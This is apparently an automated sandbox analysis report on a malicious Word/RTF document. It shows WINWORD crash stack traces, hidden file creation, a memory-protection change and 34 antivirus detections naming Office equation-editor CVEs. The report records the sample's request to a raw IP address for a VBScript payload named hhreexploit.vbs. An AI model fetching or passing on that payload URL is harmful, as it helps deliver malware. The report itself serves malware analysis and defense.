RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 2997860
registers.edi: 1974991376
registers.eax: 2997860
registers.ebp: 2997940
registers.edx: 0
registers.ebx: 80643212
registers.esi: 2147944122
registers.ecx: 3225736246

__exception__

Oct. 7, 2023, 2:45 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a
SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x67bfa648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456
0x59363a
_MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b
DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca
DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c
DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117
DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2
DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5
wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4
wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 3067700
registers.edi: 3067864
registers.eax: 3067700
registers.ebp: 3067780
registers.edx: 0
registers.ebx: 3068916
registers.esi: 3221549073
registers.ecx: 2147483648

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://193.42.33.63/hhreexploit.vbs

Performs some HTTP requests (2 events)

request	GET http://193.42.33.63/hhreexploit.vbs
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c

An application raised an exception which may be indicative of an exploit crash (4 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 1156 crashed
__exception__ Oct. 7, 2023, 2:45 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x75bb1414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 2998168 registers.edi: 1974991376 registers.eax: 2998168 registers.ebp: 2998248 registers.edx: 0 registers.ebx: 80601356 registers.esi: 2147944126 registers.ecx: 3225736246	1	0	0
__exception__ Oct. 7, 2023, 2:45 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x75c6c8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x75b698ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x75b6b641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x75b6b5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x75b6b172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x75b6a66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x75bea68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x75bc77e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x75bb14b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x75bc7b68 wdGetApplicationObject+0xedd89 DllCanUnloadNow-0x21a514 wwlib+0xd9c510 @ 0x72e8c510 DllGetLCID+0x458c18 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf2578 wwlib+0x6aaf0e @ 0x7279af0e DllGetLCID+0x45446a ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0xf6d26 wwlib+0x6a6760 @ 0x72796760 DllGetLCID+0x43ff23 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10b26d wwlib+0x692219 @ 0x72782219 DllGetLCID+0x43e5c5 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10cbcb wwlib+0x6908bb @ 0x727808bb DllGetLCID+0x43bf9f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10f1f1 wwlib+0x68e295 @ 0x7277e295 DllGetLCID+0x43b4fa ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x10fc96 wwlib+0x68d7f0 @ 0x7277d7f0 DllGetClassObject+0x233e1a DllGetLCID-0x19879 wwlib+0x238a7d @ 0x72328a7d DllGetClassObject+0x2fc15 DllGetLCID-0x21da7e wwlib+0x34878 @ 0x72124878 DllGetLCID+0xa2634 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4a8b5c wwlib+0x2f492a @ 0x723e492a DllGetLCID+0x94522 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x4b6c6e wwlib+0x2e6818 @ 0x723d6818 ?OSFCreateOfficeExtensionsDialogUser@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z+0xfb02f wdCommandDispatch-0x10ee45 wwlib+0x898677 @ 0x72988677 DllGetLCID+0x326892 ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x2248fe wwlib+0x578b88 @ 0x72668b88 DllGetLCID+0x17706f ?OSFCreateOsfOartGallery@Osf@@YGXAAUIControl@OfficeSpace@@V?$TWeakPtr@VUserInterface@Art@@@Ofc@@AAV?$TCntPtr@UIDataSource@OfficeSpace@@@5@@Z-0x3d4121 wwlib+0x3c9365 @ 0x724b9365 DllGetClassObject+0x2e77 DllGetLCID-0x24a81c wwlib+0x7ada @ 0x720f7ada FMain+0x253 DllGetClassObject-0x260 wwlib+0x4a03 @ 0x720f4a03 wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 2997860 registers.edi: 1974991376 registers.eax: 2997860 registers.ebp: 2997940 registers.edx: 0 registers.ebx: 80643212 registers.esi: 2147944122 registers.ecx: 3225736246	1	0	0
__exception__ Oct. 7, 2023, 2:45 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x754e2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x754b801a SLClose-0x28c osppc+0x2cb5 @ 0x6b252cb5 SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6b265629 SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6b253412 SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6b2629af SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x67bfa648 _MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x70f24a94 _MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x70f24823 _MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x707e30d3 _MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x707e2e1f _MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70002b05 _MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70002456 0x59363a _MsoDwGimmeUserInstallBehavior@8+0x1798b _MsoHrShowMetSharedNotebooksDlg@20-0x7dd5a mso+0xcbfd49 @ 0x707dfd49 _MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x6fd208cc _MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x6fd0fa61 _MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x6fd0f808 _MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x6fd0f7c8 _MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x6fb43b6d _MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x6fb422ad _MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x6fcd522d _MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x6fcd5189 _MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x6fcd407b _MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x6fcd3fa9 _MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x6fcd3f6b DllGetClassObject+0x6de67 DllGetLCID-0x1df82c wwlib+0x72aca @ 0x72162aca DllGetClassObject+0x6de29 DllGetLCID-0x1df86a wwlib+0x72a8c @ 0x72162a8c DllGetClassObject+0x864b4 DllGetLCID-0x1c71df wwlib+0x8b117 @ 0x7217b117 DllGetClassObject+0x66a5f DllGetLCID-0x1e6c34 wwlib+0x6b6c2 @ 0x7215b6c2 DllGetClassObject+0x63c72 DllGetLCID-0x1e9a21 wwlib+0x688d5 @ 0x721588d5 wdCommandDispatch-0x370 winword+0x15c4 @ 0x8415c4 wdCommandDispatch-0x3dc winword+0x1558 @ 0x841558 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 3067700 registers.edi: 3067864 registers.eax: 3067700 registers.ebp: 3067780 registers.edx: 0 registers.ebx: 3068916 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$.x.x.x.doc

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Oct. 7, 2023, 2:45 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000494 filepath: C:\Users\test22\AppData\Local\Temp\~$.x.x.x.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$.x.x.x.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 7, 2023, 2:45 p.m.	process_identifier: 1156 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

193.42.33.63

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Lionic	Trojan.MSOffice.CVE-2018-0802.4!c
MicroWorld-eScan	Exploit.RTF-ObfsObjDat.Gen
CAT-QuickHeal	Exp.RTF.Obfus.Gen
McAfee	RTFObfustream.c!15C5D8838026
Sangfor	Malware.Generic-RTF.Save.4aa2c45b
Cyren	RTF/ABRisk.IVKL-4
Symantec	Exp.CVE-2017-11882!g5
ESET-NOD32	multiple detections
Avast	Other:Malware-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Exploit.MSOffice.CVE-2018-0802.gen
BitDefender	Exploit.RTF-ObfsObjDat.Gen
NANO-Antivirus	Exploit.Rtf.Heuristic-rtf.dinbqn
Tencent	Office.Exploit.Cve-2018-0802.Eplw
Emsisoft	Exploit.RTF-ObfsObjDat.Gen (B)
F-Secure	Heuristic.HEUR/Rtf.Malformed
DrWeb	Exploit.CVE-2018-0798.4
VIPRE	Exploit.RTF-ObfsObjDat.Gen
TrendMicro	HEUR_RTFMALFORM
McAfee-GW-Edition	BehavesLike.BadFile.mx
FireEye	Exploit.RTF-ObfsObjDat.Gen
GData	Exploit.RTF-ObfsObjDat.Gen
Avira	HEUR/Rtf.Malformed
MAX	malware (ai score=81)
Arcabit	Exploit.RTF-ObfsObjDat.Gen
ZoneAlarm	HEUR:Exploit.MSOffice.CVE-2018-0802.gen
Microsoft	Exploit:Win32/CVE-2017-11882!ml
Google	Detected
AhnLab-V3	RTF/Malform-A.Gen
ALYac	Exploit.RTF-ObfsObjDat.Gen
Zoner	Probably Heur.RTFBadHeader
Ikarus	Exploit.RTF.Doc
Fortinet	MSOffice/CVE_2018_0798.BOR!exploit
AVG	Other:Malware-gen [Trj]

x.x.x.x.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All